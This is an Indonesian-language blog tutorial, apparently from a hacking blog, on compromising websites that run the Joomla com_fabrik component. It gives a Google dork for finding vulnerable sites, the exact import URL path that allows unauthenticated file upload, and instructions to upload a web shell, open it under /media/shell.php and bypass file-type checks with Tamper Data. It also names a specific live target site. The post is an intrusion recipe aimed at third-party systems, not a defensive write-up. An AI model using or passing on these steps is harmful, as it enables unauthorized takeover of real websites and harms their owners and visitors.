Sekarang kita praktek, tapi ada syaratnya :p . Anda harus berusaha untuk mencapainya, jangan langsung nanya sebelum baca. Oke ! Lansung ke TKP.
1. Copas dork ini ke google [dork bisa dikembangkan]
- inurl:index.php?option=com_fabrik
2. Ceritanya kita sudah mendapat si target
- http://ar.librodar.com.ar/index.php?option=com_fabrik
3. Maka pastekan Vulnerable path nya di depan Url, Vulnerable path nya adalah ini :
- index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
4. Maka akan jadi seperti ini
- http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
5. Langsung saja upload file, gak perlu dicentang kok ;) . Oh ya filenya bisa bertipe
- php,asp,html,jpg
6. Sudah ? nah sekarang kita akses shellnya di
- http://localhost.com/media/shell.php
Kalo tipe .php gabisa ya terpaksa dengan tamper data :D
Live Target : http://ar.librodar.com.ar/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Sekian tutorial nya semoga bermanfaat kalau ada salah salah kata mohon dimaafkan
0 komentar:
Posting Komentar